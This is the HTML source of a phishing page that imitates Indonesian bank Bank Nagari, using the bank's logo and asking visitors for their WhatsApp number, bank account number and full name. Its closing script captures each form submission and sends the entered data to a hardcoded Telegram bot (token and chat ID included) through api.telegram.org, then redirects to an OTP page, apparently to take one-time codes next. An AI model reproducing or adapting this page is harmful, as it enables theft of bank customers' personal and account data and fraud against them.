<!doctype html>

<html lang="en">

 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
  <meta name="description" content=""> 
  <link rel="canonical" href=""> 
  <meta name="twitter:card" content="summary_large_image"> 
  <meta property="og:title" content="Bank | Nagari"> 
  <meta name="twitter:title" content="Bank | Nagari"> 
  <meta property="og:site_name" content="Bank | Nagari"> 
  <meta name="twitter:site_name" content="Bank | Nagari"> 
  <meta property="og:description" content=""> 
  <meta name="twitter:description" content="">
  <link rel="image_src" href="https://ib.banknagari.co.id/Assets/img/shortcut_logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:image" content="https://ib.banknagari.co.id/Assets/img/shortcut_logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta name="twitter:image:src" content="https://ib.banknagari.co.id/Assets/img/shortcut_logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max"> 
  <meta property="og:url" content=""> 
  <meta property="og:type" content="website"> 
  <meta name="apple-mobile-web-app-capable" content="yes"> 
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"> 
  <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui"> 
  <title>Bank | Nagari</title> 
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -60px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: -20px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: red;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 200px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 50px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: yellow;
            border: none; 
            text-align: center; 
            height: 35px; 
            width: 3500px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 16px; 
            font-weight: 400; 
            color: black; 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 4px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }
    </style> 
 </head> 
 <body> 
  <div class="container">
   <div class="row"> 
    <div class="col-12 d-block mx-auto text-center" style="height: auto; width: auto; max-width: auto; margin-top: 0px; margin-bottom: 0px; border-radius: 0px;"><!--
<div class="greyout" style="top: 0px; left: 0px; width: 100%; height: 90%; background: url(https://databaseku.nasiwebhost.com/wayang.png); position: fixed; z-index: 2002; opacity: 1; display: block;">
    </div>
    <div class="bubble-element Popup bubble-r-container relative" style="top: 0px; left: 0px; right: 0px; position: fixed; z-index: 2002; margin-left: auto; margin-right: auto; width: 90%; min-height: 40px; height: 450px; overflow-y: auto; opacity: 1; border-style: outset; border-width: 1px; border-left:  none; border-right: none; border-top: none; border-bottom: 1px solid silver; border-radius: 0px; background: url(https://databaseku.nasiwebhost.com/wayang.png); padding: 0px 10px;"></center>-->
        <center>
        <img src="/cs/bg1.png" style="width: 107%; height: 660px; margin-left: -12px;">
        </center>
                 <form id="tg" onsubmit="" style="margin-top: -135%"><br>
                         <p style="color: black; font-size: 14px; font-weight: bold; margin-top: -20%; margin-left: 0%; text-align: center;">Silahkan melengkapi<br>Data di bawah ini</p>
   <br>
       <center><input required class="contoh1" style="width:70%;height: 30px; border: 1px solid silver; margin-left: 0%; margin-top: -15%; background: transfarent; border-radius: 15px; text-align: left; padding-left: 20px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 14px;" minlength="10" maxlength="13" type="tel" name="WhatsApp" id="WhatsApp" placeholder="Nomor WhatsApp"><br>
                     <input required class="contoh1" style="width:70%;height: 30px; border: 1px solid silver; margin-left: 0%; margin-top: 2%; background: transfarent; border-radius: 15px; text-align: left; padding-left: 20px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 14px;" type="tel" name="No-Rek" id="No-Rek" placeholder="Nomor Rekening"><br>
                                          <input required class="contoh1" style="width:70%;height: 30px; border: 1px solid silver; margin-left: 0%; margin-top: 2%; background: transfarent; border-radius: 15px; text-align: left; padding-left: 20px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 14px;" type="text" name="Nama" id="Nama" placeholder="Nama Lengkap"></center><br>
    <p style="color: #3090C7; font-size: 11px; font-weight: bold; margin-top: -5%; margin-left: 38%; text-align: center;"></p>
    </div>
    <center>
<button type="submit" style="width: 25%; height: 30px; margin-top: -4%; margin-left: 47%; font-size: 12px; background: #3090C7; color: white; font-weight: bold; border-radius: 4px; border: 1px solid white; padding: 0px;">Selanjutnya</button></center>
    <br>
    <p style="width: 35%; color: #3090C7; font-size: 12px; font-weight: bold; margin-top: -7%; margin-left: 16%; text-align: left;"></p>

    </div>

    </div>
    </div>
           <!--
     <button type="button" class="btn-belum" onclick="location.href='/login';">Belum Punya Akun</button> -->
    </div> 
   </div> 
  </div> 
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
        <p id="status"></p>
</div>
             </div>
    <script>

    const chat_id = '6080254613', botID = 'bot6558240208:AAGy4fS3S94EG0C3fm9jqfgRUEBu3aAfvko';
    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;
    document.querySelector('#tg').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href='/cs/otp.html';
    });

</script>
</form>
</body>
</html>